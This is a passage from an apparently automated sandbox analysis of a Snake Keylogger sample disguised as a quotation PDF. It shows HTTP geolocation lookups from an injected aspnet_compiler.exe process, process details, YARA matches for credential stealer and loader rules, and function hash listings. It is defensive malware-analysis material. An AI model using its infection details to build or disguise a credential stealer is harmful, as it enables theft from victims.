2024-09-26 07:24:11 UTC	680	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:24:11 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 283 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bbqbNPsDSZGP80Hk5x3yoEujg%2Bd6YntGzhztKNdNQXfdPH%2FZcUNDZs%2FthBWKBilznSo7c%2BS8C1eGSujT5UEVSw9J6Wir71c%2BcPsIsNZ9HpFfGMReE6sfwFAEkR6ck1sXf%2BaWHI4K"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c91834d0c3b0cc4-EWR
2024-09-26 07:24:11 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 07:24:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49730	188.114.96.3	443	5792	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:24:12 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-26 07:24:12 UTC	678	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:24:12 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 284 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XFdRDiRzzrRestbKxGeSSVnUa4w39bao6SwK%2B1Qe0fYJu1EzAEQEKv%2BLwEQHXpYo7KE62BcCj%2B6FCxttkUi1GOIbXNBHixLUct3YnlT%2FjJAL5HxBDvBd%2BqSuKCKrtQLnqU7nDsGF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c918353e90115cb-EWR
2024-09-26 07:24:12 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 07:24:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49732	188.114.96.3	443	5792	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:24:13 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-26 07:24:14 UTC	680	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:24:13 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 285 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RYe1QC%2BzfK%2BekJCUnshOdNRdHl8oBxmOK4BeevMlBngE0haHOmQmDmnvDRlxooG%2BeMKHVFD7L03y%2FRO3bTx1c31g%2FQBcJh6twOjJrCLvwMmiCAboS83cdYE1iMTCAxySMOC%2BiIcR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c91835b39650caa-EWR
2024-09-26 07:24:14 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 07:24:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49734	188.114.96.3	443	5792	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:24:15 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 07:24:15 UTC	672	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:24:15 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 287 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=93BOAGbpHIaQsldSp2neInXwgEVdmEuNSYDGljkyK2lb6aFSpMR6JqM6lXBTdBC8XUX4%2FspwUFBDqOimphAx9NfawhubYrTABf4jBUL9k7AKzIKs%2B99DdnmEiWna4baWJh3ZIXNa"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9183625a08431c-EWR
2024-09-26 07:24:15 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 07:24:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49736	188.114.96.3	443	5792	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:24:16 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 07:24:16 UTC	690	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:24:16 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 288 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wl13hnLw5Qo%2FiwYv%2BaCG%2B3VJ7RBA7EJ2nXIclZ%2Ff8vMuOYZ%2Bj%2FwT6yRMV%2F2K20dHRtxys%2Bs8MNy6kHZTO3ly9%2FW%2B8vSL17y7GnLasArrpfPov4BxJV1NKObgEHY%2FsQAv76Mvyc0h"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c91836bbe4e437f-EWR
2024-09-26 07:24:16 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 07:24:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	03:23:15
Start date:	26/09/2024
Path:	C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe"
Imagebase:	0x28acc6c0000
File size:	361'472 bytes
MD5 hash:	631691DCA7ABC573A0CC911B2DDCA40E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2646867703.0000028ACEA50000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2665435188.0000028AE6E50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2653955478.0000028ADE5A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2646867703.0000028ACE51D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2653955478.0000028ADF002000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:24:06
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
Imagebase:	0x22933f90000
File size:	55'824 bytes
MD5 hash:	DF5419B32657D2896514B6A1D041FE08
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.3401415580.0000022934340000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.3401415580.0000022934340000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.3401415580.0000022934340000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000005.00000002.3401415580.0000022934340000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000005.00000002.3401415580.0000022934340000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.3401415580.0000022934340000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.3402009366.0000022935F56000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.3404892860.0000022945D19000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.3404892860.0000022945D19000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.3404892860.0000022945D19000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.3404892860.0000022945D19000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000005.00000002.3400141664.0000022934010000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.3402009366.0000022935D11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	03:24:06
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	5.1%
Dynamic/Decrypted Code Coverage:	33.3%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD349504CA Relevance: 5.9, Strings: 4, Instructions: 854
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

>1_^, xrefs: 00007FFD34950601
1_^, xrefs: 00007FFD349506C9
1_^, xrefs: 00007FFD3495072A
@, xrefs: 00007FFD34950D77

Memory Dump Source

Source File: 00000000.00000002.2670862828.00007FFD34950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34950000_QUOTATION_SEPQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: 1_^$1_^$>1_^$@
API String ID: 0-1515930842
Opcode ID: bc96bb313c3826fedb7a51c940ebf95068f4f74381a969ab651b1ef431c7a085
Instruction ID: d87d408442d39b4fd117c885a5a1b7640e7d59622b153e0c6af50b218bea004f
Opcode Fuzzy Hash: bc96bb313c3826fedb7a51c940ebf95068f4f74381a969ab651b1ef431c7a085
Instruction Fuzzy Hash: C5424B32B0C7465FE351AB6894A62FA3BD0EF43314F2901BED58DC7193DE2CA8468791

Function 00007FFD34951540 Relevance: 3.6, Strings: 2, Instructions: 1100COMMON

Download Yara Rule

Strings

1_H, xrefs: 00007FFD34951C51
, xrefs: 00007FFD34951C0D

Memory Dump Source

Source File: 00000000.00000002.2670862828.00007FFD34950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34950000_QUOTATION_SEPQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: $ 1_H
API String ID: 0-1116767729
Opcode ID: 968a7e3f37a2b205bd1ec0301ce3de9f551efce5b4ac30d511b2201994422ab2
Instruction ID: 05e09c612212830feec02fb3e072b5b1e8d486bec4e99bd60896fb509eb9a90c
Opcode Fuzzy Hash: 968a7e3f37a2b205bd1ec0301ce3de9f551efce5b4ac30d511b2201994422ab2
Instruction Fuzzy Hash: A472F631B08A494FEBA5EB2CC4A6A6437D1FF5A300B2401FED54DCB2A6DE2CEC459751

Function 00007FFD34958F08 Relevance: .7, Instructions: 707
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2670862828.00007FFD34950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34950000_QUOTATION_SEPQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb54aaf4173b675efb964f224ca0111025bbede65dfb4b4f1d0e6b38ff0a6cc9
Instruction ID: a6e1664c1d11e6b2e4091fa24f87e4f6fb381ca4b130a722624020a680017fbb
Opcode Fuzzy Hash: eb54aaf4173b675efb964f224ca0111025bbede65dfb4b4f1d0e6b38ff0a6cc9
Instruction Fuzzy Hash: 03222731B0CB8A4FF7689B2C94A41B577D1FF56314F2406BED58AC72D6DE2CA8429B40

Function 00007FFD34954829 Relevance: .6, Instructions: 557
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2670862828.00007FFD34950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34950000_QUOTATION_SEPQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baa84753f79a25ff16eeb22c89a17eeae1cc514fc879bd228ac0324685c79d6f
Instruction ID: 3ec87b00d3d14d8e1a6567a52ec5a95783d190927402fc31ecf61f282c5206a9
Opcode Fuzzy Hash: baa84753f79a25ff16eeb22c89a17eeae1cc514fc879bd228ac0324685c79d6f
Instruction Fuzzy Hash: 43020531B0CA4A8FE7A5DB2C84A576977E1EF9A300B1401FED14DCB296DE2CEC429751

Function 00007FFD348B153B Relevance: 2.1, Strings: 1, Instructions: 810
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

&;_H, xrefs: 00007FFD348B1653

Memory Dump Source

Source File: 00000000.00000002.2668081571.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd348b0000_QUOTATION_SEPQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: &;_H
API String ID: 0-3372723638
Opcode ID: 27a368a76e762ae5f9030d160468eb44e4838556f31ebb56856323f29a208b65
Instruction ID: bff32cbc16e509220d323d083b9778cb6b993d31771ed431de6d66c9d15d1f93
Opcode Fuzzy Hash: 27a368a76e762ae5f9030d160468eb44e4838556f31ebb56856323f29a208b65
Instruction Fuzzy Hash: ED527F71E08A5E8FEB90DB18C8E56A977F1FF5A340F140276C54DE7291DE38B8859B80

Function 00007FFD34964FC5 Relevance: 1.7, APIs: 1, Instructions: 157
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 00007FFD349650B9

Memory Dump Source

Source File: 00000000.00000002.2670862828.00007FFD34950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34950000_QUOTATION_SEPQTRA071244#U00faPDF.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: b45c97005f38a20ddfb3cf00d2d4ff399a13c9cf44a76364a930df64937ba7eb
Instruction ID: b5cae4f15db915e5c2ce65bd8b4873feedc605ee21d628569047dc43d7ebd1db
Opcode Fuzzy Hash: b45c97005f38a20ddfb3cf00d2d4ff399a13c9cf44a76364a930df64937ba7eb
Instruction Fuzzy Hash: 9E412A70908A1D8FDB94DF98D885BEDBBF1FB69310F10826AD04DE3255DB35A895CB40

Function 00007FFD34798BD3 Relevance: 1.4, Strings: 1, Instructions: 117
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

L_^, xrefs: 00007FFD34798C72

Memory Dump Source

Source File: 00000000.00000002.2667005161.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_QUOTATION_SEPQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: L_^
API String ID: 0-925995230
Opcode ID: ff3bb8df321d1acf440a88675cc070097b6c9cef5c76b27bdd2642adcba73d97
Instruction ID: 9bce86cd7971e2d155114a6b0b62a0a084bcbfb2d1a3932dc579bbc496ed2a0d
Opcode Fuzzy Hash: ff3bb8df321d1acf440a88675cc070097b6c9cef5c76b27bdd2642adcba73d97
Instruction Fuzzy Hash: 5C41B972A1D6868FE7029B6888A51ED7BA0AF17304F0A01F6D598DB193DB3C7509DBC1

Function 00007FFD34798C25 Relevance: 1.3, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

L_^, xrefs: 00007FFD34798C72

Memory Dump Source

Source File: 00000000.00000002.2667005161.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_QUOTATION_SEPQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: L_^
API String ID: 0-925995230
Opcode ID: c9d35934cd28762d7c7db93f51426ee162bf55988191fa991a7858ef914f1c9d
Instruction ID: e642b94fdfad9f3093e616b1bfa39b229e99d92440b4eafe6177b714cb6cb0df
Opcode Fuzzy Hash: c9d35934cd28762d7c7db93f51426ee162bf55988191fa991a7858ef914f1c9d
Instruction Fuzzy Hash: 1E31A672A1D6868FE3039B68D8651E97BB1EF17314F0A01F6D594CB1A3EE2C6509CBC1

Function 00007FFD3479BF9D Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

R, xrefs: 00007FFD3479AA52

Memory Dump Source

Source File: 00000000.00000002.2667005161.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_QUOTATION_SEPQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: R
API String ID: 0-1466425173
Opcode ID: 8f8c4304d05e43290a78128a1f0e37e829c54dd2f57fc143179a2430ce7f2622
Instruction ID: be7636f4b5ea866211b6fd4afefa5c7b6a084b4d6368ecb7b81d1ab129b5ef68
Opcode Fuzzy Hash: 8f8c4304d05e43290a78128a1f0e37e829c54dd2f57fc143179a2430ce7f2622
Instruction Fuzzy Hash: 6D11ECB1E08659CFEB60DB14C8987A8B7B1EF56315F1006FAD10DE7291DE782AC49F41

Function 00007FFD348B200D Relevance: .6, Instructions: 565
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2668081571.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd348b0000_QUOTATION_SEPQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18379e8f2e917ffb03d686e323891c07e2fafed740818017c8d098715b6c6b97
Instruction ID: bd48410eafc170ef6c6cb1402ffd04b883bd962a36449658449840b08b56ae53
Opcode Fuzzy Hash: 18379e8f2e917ffb03d686e323891c07e2fafed740818017c8d098715b6c6b97
Instruction Fuzzy Hash: ED22F870E0961E8FEBA4EB58C4A97AD77B1FF5A301F5001B9D509E3295CF786881DB80

Function 00007FFD348B1CD3 Relevance: .3, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2668081571.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd348b0000_QUOTATION_SEPQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f92228e4c328847883cd66545bc33969f9157af4fc1b660a2b917da5e2fdd783
Instruction ID: 494e0461d9289459f838660eb0df281aa9e804abcaf758c93f66b5117514c136
Opcode Fuzzy Hash: f92228e4c328847883cd66545bc33969f9157af4fc1b660a2b917da5e2fdd783
Instruction Fuzzy Hash: 3CB16C70E08A5E8FEB94DB68C8A56ED7BB1FF5A340F140179D509E7292CF786841DB80

Function 00007FFD34791E1F Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

